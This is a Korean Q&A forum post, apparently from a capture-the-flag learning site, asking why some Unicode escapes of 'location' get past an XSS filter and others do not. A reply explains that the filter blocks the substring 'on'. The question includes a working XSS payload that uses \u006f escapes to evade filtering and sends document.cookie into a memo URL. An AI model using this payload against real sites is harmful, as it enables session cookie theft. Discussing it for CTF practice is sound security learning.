유니코드 우회에서 질문이 있습니다.
공격 페이로드를 param=<iframe+src%3d"javascr ipt%3alocati\u006f\u006e.href%3d' /memo%3fmemo%3d'%2bd\u006fcument.co\u006fkie"/> 이렇게 작성해서 플래그를 획득했는데,
근데 location을 우회할 때 2번째 글자 'o'를 우회하여
l\u006fcation 으로 우회하면 플래그 획득이 안 되고
locati\u006fn 혹은 locati\u006f\u006e 이렇게 해야지만 플래그가 획득되는데 이유가 뭘까요?
#web
답변
1
hoppi_
대표 업적 없음
안녕하세요 잊어지지않아님
제공된 app.py를 읽어보시면, _filter list에 on이 존재합니다.
따라서 l\u006fcation는 끝이 on으로 끝나기 때문에 필터에 걸립니다.
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
